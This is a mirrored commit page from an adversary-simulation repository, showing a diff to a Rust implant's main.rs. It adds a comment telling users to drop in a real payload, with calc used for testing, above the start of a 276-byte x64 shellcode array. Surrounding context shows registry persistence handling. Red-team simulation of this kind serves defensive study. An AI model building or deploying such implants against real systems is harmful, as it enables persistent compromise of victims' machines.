mirror of
https://github.com/S3N4T0R-0X0/APTs-Adversary-Simulation.git
synced 2026-08-04 09:41:40 +02:00
Update main.rs
This commit is contained in:
@@ -449,7 +449,9 @@ fn main() {
|
||||
Err(e) => eprintln!("[!] Registry persistence error: {}\n", e),
|
||||
}
|
||||
|
||||
// ===== SHELLCODE =====
|
||||
// ===== SHELLCODE =====
|
||||
|
||||
// Put the actual payload here, and use calc here for testing purposes only.
|
||||
let shellcode: [u8; 276] = [
|
||||
0xfc, 0x48, 0x83, 0xe4, 0xf0, 0xe8, 0xc0, 0x00, 0x00, 0x00, 0x41, 0x51,
|
||||
0x41, 0x50, 0x52, 0x51, 0x56, 0x48, 0x31, 0xd2, 0x65, 0x48, 0x8b, 0x52,
|
||||
|
||||
Reference in New Issue
Block a user